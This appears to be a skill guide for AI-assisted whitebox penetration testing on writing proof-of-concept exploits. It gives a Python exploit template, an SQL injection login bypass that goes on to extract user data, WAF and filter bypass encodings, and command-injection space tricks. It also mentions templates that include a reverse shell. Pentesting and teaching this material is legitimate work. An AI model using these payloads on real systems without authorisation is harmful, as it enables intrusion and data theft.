Exploit Techniques

Exploit Development Techniques

Purpose

Guide the development of Proof of Concept (PoC) exploits to demonstrate confirmed vulnerabilities. This is Phase 3 of the whitebox pentesting process.

When to Use

Activate this skill when:

• A vulnerability has been confirmed through local testing
• Writing automated exploit scripts
• Documenting exploitation steps
• Bypassing security controls

Language Selection

Choose exploit language based on target:

Scenario	Recommended Language
Web application (server-side)	Python
Client-side attack (browser)	JavaScript
Mixed (client + server chain)	Python + JavaScript
Binary exploitation	Python (pwntools)
Windows target	Python or PowerShell
Linux target	Python or Bash
Reusing application logic	Same as application

Python Exploit Structure

Basic Template

#!/usr/bin/env python3
"""
Exploit: [Application Name] [Vulnerability Type]
Author: [Your Name]
Date: [Date]
CVE: [If applicable]

Description:
[Brief description of the vulnerability]

Usage:
python3 exploit.py <target_url>
"""

import requests
import sys
import argparse

class Exploit:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.session = requests.Session()
    
    def check_vulnerable(self):
        """Verify target is vulnerable"""
        # Implementation
        pass
    
    def exploit(self):
        """Execute the exploit"""
        # Implementation
        pass
    
    def cleanup(self):
        """Remove any artifacts"""
        # Implementation
        pass

def main():
    parser = argparse.ArgumentParser(description='Exploit description')
    parser.add_argument('target', help='Target URL')
    parser.add_argument('--check', action='store_true', help='Check only')
    args = parser.parse_args()
    
    exploit = Exploit(args.target)
    
    if args.check:
        if exploit.check_vulnerable():
            print("[+] Target is vulnerable")
        else:
            print("[-] Target is not vulnerable")
        return
    
    try:
        exploit.exploit()
    finally:
        exploit.cleanup()

if __name__ == '__main__':
    main()

HTTP Requests Pattern

import requests

# Basic GET
response = requests.get(f"{target}/path", params={"key": "value"})

# POST with data
response = requests.post(f"{target}/path", data={"key": "value"})

# POST with JSON
response = requests.post(f"{target}/path", json={"key": "value"})

# With headers
headers = {"Authorization": "Bearer token", "X-Custom": "value"}
response = requests.get(f"{target}/path", headers=headers)

# With cookies
cookies = {"session": "abc123"}
response = requests.get(f"{target}/path", cookies=cookies)

# Session persistence
session = requests.Session()
session.post(f"{target}/login", data={"user": "admin", "pass": "pass"})
session.get(f"{target}/admin")  # Session cookies maintained

Exploit Development Workflow

Step 1: Document Manual Steps

Before automating, document each manual step:

1. Send request to /login with username=admin' OR 1=1--
2. Extract session token from response cookie
3. Access /admin/users with session token
4. Extract user data from response

Step 2: Implement Core Exploit

Translate manual steps to code:

def exploit(self):
    # Step 1: SQL Injection for auth bypass
    login_data = {"username": "admin' OR 1=1--", "password": "x"}
    resp = self.session.post(f"{self.target}/login", data=login_data)
    
    if "Welcome" not in resp.text:
        print("[-] Authentication bypass failed")
        return False
    
    # Step 2: Access admin panel
    resp = self.session.get(f"{self.target}/admin/users")
    
    # Step 3: Extract data
    users = self.parse_users(resp.text)
    return users

Step 3: Add Error Handling

def exploit(self):
    try:
        resp = self.session.post(f"{self.target}/login", data=payload, timeout=10)
        resp.raise_for_status()
    except requests.exceptions.Timeout:
        print("[-] Request timed out")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

Step 4: Add Verification

def check_vulnerable(self):
    """Non-destructive vulnerability check"""
    test_payload = "admin' AND '1'='1"
    resp = self.session.post(f"{self.target}/login", 
                              data={"username": test_payload, "password": "x"})
    
    # Check for SQL error or successful bypass
    indicators = ["SQL syntax", "mysql_fetch", "Welcome admin"]
    return any(ind in resp.text for ind in indicators)

Step 5: Add Cleanup

def cleanup(self):
    """Remove artifacts created during exploitation"""
    # Delete uploaded files
    # Restore modified data
    # Remove created accounts
    pass

Bypass Techniques

WAF Bypass in Payloads

# URL encoding
payload = urllib.parse.quote(payload)

# Double URL encoding
payload = urllib.parse.quote(urllib.parse.quote(payload))

# Unicode encoding
payload = payload.encode('unicode_escape').decode()

# Case variation
payload = ''.join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))

Filter Bypass

# Space alternatives
payload = payload.replace(' ', '/**/') # SQL
payload = payload.replace(' ', '${IFS}') # Command injection

# Quote alternatives
payload = payload.replace("'", "\\x27")
payload = payload.replace('"', '\\x22')

Output and Reporting

Success Indicators

def print_success(self, message):
    print(f"\033[92m[+]\033[0m {message}")

def print_error(self, message):
    print(f"\033[91m[-]\033[0m {message}")

def print_info(self, message):
    print(f"\033[94m[*]\033[0m {message}")

Structured Output

def generate_report(self):
    return {
        "target": self.target,
        "vulnerability": "SQL Injection",
        "endpoint": "/login",
        "parameter": "username",
        "payload": self.payload,
        "impact": "Authentication Bypass",
        "exploited": True,
        "data_extracted": self.extracted_data
    }

Security Considerations

Safe Testing

1. Always test on authorized targets only
2. Use non-destructive payloads when possible
3. Implement cleanup routines
4. Avoid DoS conditions
5. Log all actions for accountability

Responsible Disclosure

1. Document findings clearly
2. Provide remediation guidance
3. Allow reasonable fix timeline
4. Coordinate disclosure with vendor

Additional Resources

Example Files

Working exploit templates in examples/:

• sqli-template.py - SQL injection exploit with union/blind detection
• cmdi-template.py - Command injection with OS detection and reverse shell
• deser-template.py - Deserialization exploits (Python, PHP, Java formats)

Integration with Other Skills

• Use dangerous-functions to identify initial targets
• Use data-flow-tracing to confirm vulnerability
• Use vuln-patterns for technique selection